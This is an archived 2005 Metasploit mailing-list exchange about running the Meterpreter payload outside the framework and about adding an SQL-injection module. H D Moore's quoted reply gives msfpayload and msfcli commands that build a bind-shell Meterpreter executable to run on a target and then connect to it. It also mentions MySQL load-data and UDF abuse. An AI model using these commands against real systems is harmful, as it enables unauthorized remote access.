Metasploit mailing list archives
using Meterpreter , out of MSF
From: elite_netbios at yahoo.com (Hamid . K)
Date: Wed, 26 Oct 2005 03:03:33 -0700 (PDT)
Hi Thank you both for answers , but , I guess something is wrong here with me , or the method HDM mentioned : $ ./msfpayload win32_bind_meterpreter LPORT=4321 X Warning: Multistage payloads only return first stage ... as meterpreter is a staged one , I guess this error is the reason of my failed test :) after running generated excuteable file , no port is opened , nor meterpreter client can connect to box. I`ll keep trying ... regards Hamid. --- H D Moore <hdm at metasploit.com> wrote:
On Tuesday 25 October 2005 19:07, Hamid . K wrote:I was curious , if anyone tried to loadmeterpreterlibrary , out of framework ?The easy way: $ msfpayload win32_bind_meterpreter LPORT=4321 X > met.exe Copy this executable to the target system and find some way to execute it. After executing it, you can use the "payload_handler" exploit to connect and interact with it: $ msfcli payload_handler PAYLOAD=win32_bind_meterpreter LPORT=4321 \ RHOST=<target_system> E Alternatively, you can use the source code in ./src and just build your own client/server implementation using it.Second ; Is the idea of adding an automated sql-injection module to MSF .The problem there is that version 2.x is exploit-driven - if you can't use one of the standard payloads or accomplish a very specific task, then it means writing a whole library around post-sql-injection remote compromise. Adding a mysql module means creating paylaods for uploading files or executing commands via the mysql stored procedures (load data infile, the UDF stuff that abuses blank passwords, etc). If someone came up with some plausible/useful payloads that would work with generic SQL injection, I would definitely be interested in integrating it. Version 3.x is going to include "recon" modules, so a generic table enumeration module would fit into it much better than 2.x. -HD
__________________________________ Yahoo! Mail - PC Magazine Editors' Choice 2005 http://mail.yahoo.com
Current thread:
- using Meterpreter , out of MSF // SQL Injection module Hamid . K (Oct 25)
- using Meterpreter , out of MSF // SQL Injection module str0ke (Oct 25)
- using Meterpreter , out of MSF // SQL Injection module mmiller at hick.org (Oct 25)
- using Meterpreter , out of MSF // SQL Injection module H D Moore (Oct 25)
- using Meterpreter , out of MSF Hamid . K (Oct 26)
- using Meterpreter , out of MSF // SQL Injection module RaMatkal (Oct 27)
- using Meterpreter , out of MSF // SQL Injection module Jerome Athias (Oct 27)
- using Meterpreter , out of MSF // SQL Injection module news-letters (Oct 27)
- using Meterpreter , out of MSF // SQL Injection module mmiller at hick.org (Oct 27)
- using Meterpreter , out of MSF // SQL Injection module Fabrice MOURRON (Oct 27)
- using Meterpreter , out of MSF // SQL Injection module Andre Ludwig (Oct 27)
- using Meterpreter , out of MSF // SQL Injection module Kurt Grutzmacher (Oct 27)
- using Meterpreter , out of MSF // SQL Injection module jasf (Oct 27)
- <Possible follow-ups>
- using Meterpreter , out of MSF // SQL Injection module ahead at mediageneral.com (Oct 27)
- using Meterpreter , out of MSF // SQL Injection module Tim Brown (Oct 28)